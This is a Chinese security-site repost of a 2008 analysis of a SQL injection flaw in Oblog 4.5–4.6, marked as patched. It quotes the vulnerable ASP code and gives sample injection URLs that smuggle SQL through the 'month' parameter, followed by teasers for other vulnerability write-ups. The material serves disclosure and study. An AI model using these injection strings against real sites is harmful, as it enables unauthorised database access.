当前位置：代码网 > 服务器>网络安全>漏洞分析 > Oblog最新注入漏洞分析(已修补)

Oblog最新注入漏洞分析(已修补)

2008年10月08日 • 漏洞分析 •我要评论

Oblog最新注入漏洞分析(已修补) Date：2008-5-15 Author：Yamato[BCT] Version：Oblog 4.5-4.6 sql 代码分析：文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("... 08-10-08

                    
date：2008-5-15 author：yamato[bct] version：oblog 4.5-4.6 sql 代码分析： 文件in/class_usercommand.asp : strmonth=request("month") //第63行 strday=request("day") …… case "month" //第84行 dim lastday g_p_filename = g_p_filename & "month&month=" & strmonth strday=left(strmonth,4) & "-" & right(strmonth,2) & "-01" myear=left(strmonth,4) mmonth=right(strmonth,2) if instr ("01,03,05,07,08,10,12",mmonth)> 0 then lastday = "31"…… else //第109行 sqlpart = " and addtime >=’"&strmonth&"01’ and addtime < ’"&strmonth&lastday&"’ " 构造合适的变量strmonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strday变量从month中获得日期数据，并判断strday是否为日期数据。所以构造的注射语句为： http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.open strsql,conn,1,1 不能修改记录集.

世界之窗等浏览器本地xss跨域漏洞POC

世界之窗等浏览器本地xss跨域漏洞POC 漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.ht... [阅读全文]
关于XSS漏洞另一个攻击趋势

关于XSS漏洞另一个攻击趋势 XSS漏洞一般是基于WEB程序的输入输出问题，但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞，在评估其中的XS... [阅读全文]
PHPCMS2.4中一个有趣的洞洞

PHPCMS2.4中一个有趣的洞洞今天，朋友丢来一个站，说想拿点资料，但搞了很久老搞不下，叫我帮忙看看打开一看发现是phpcms2.4，很旧的版本了~~搞了... [阅读全文]
Apple Safari KHTML WebKit远程拒绝执行服务漏洞

Apple Safari KHTML WebKit远程拒绝执行服务漏洞受影响系统： Apple Safari 2.0 不受影响系统： Apple Safar... [阅读全文]
IBM Tivoli Storage Manager Express 堆溢出漏洞

IBM Tivoli Storage Manager Express 堆溢出漏洞受影响系统： IBM Tivoli Storage Manager Expr... [阅读全文]
Microsoft Visual Interdev 文件缓冲区溢出漏洞

Microsoft Visual Interdev 文件缓冲区溢出漏洞受影响系统： Microsoft Visual InterDev 6.0 (SP6) ... [阅读全文]

发表评论


验证码：

Oblog最新注入漏洞分析(已修补)

2008年10月08日 • 漏洞分析 •我要评论

相关文章:

发表评论